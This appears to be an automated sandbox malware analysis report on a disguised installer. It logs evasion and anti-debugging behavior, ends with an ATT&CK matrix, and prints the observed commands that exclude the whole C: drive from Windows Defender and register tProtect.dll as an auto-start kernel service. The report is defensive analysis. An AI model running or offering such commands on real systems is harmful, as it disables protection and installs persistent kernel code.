Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6323Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3351Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpWindow / User API: threadDelayed 595Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpWindow / User API: threadDelayed 650Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpWindow / User API: threadDelayed 561Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-U1N14.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MRB94.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-U1N14.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-MRB94.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC4AEC0 FindFirstFileA,FindClose,6_2_6CC4AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007C6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_007C6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007C7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_007C7496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007C9C60 GetSystemInfo,10_2_007C9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000002.2138341068.00000000015DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CAD3886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6CAD3886
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC60181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CC60181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_008457D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_008457D0
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC69D66 mov eax, dword ptr fs:[00000030h]6_2_6CC69D66
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC69D35 mov eax, dword ptr fs:[00000030h]6_2_6CC69D35
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC5F17D mov eax, dword ptr fs:[00000030h]6_2_6CC5F17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC58CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6CC58CBD
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CC60181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CC60181

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-HSI1O.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-3G83D.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpCode function: 6_2_6CD27700 cpuid 6_2_6CD27700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007CAB2A GetSystemTimeAsFileTime,10_2_007CAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00860090 GetVersion,10_2_00860090
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory431
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution
Logon Script (Windows)111
Process Injection
241
Virtualization/Sandbox Evasion
Security Account Manager241
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Native API
Login Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem45
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
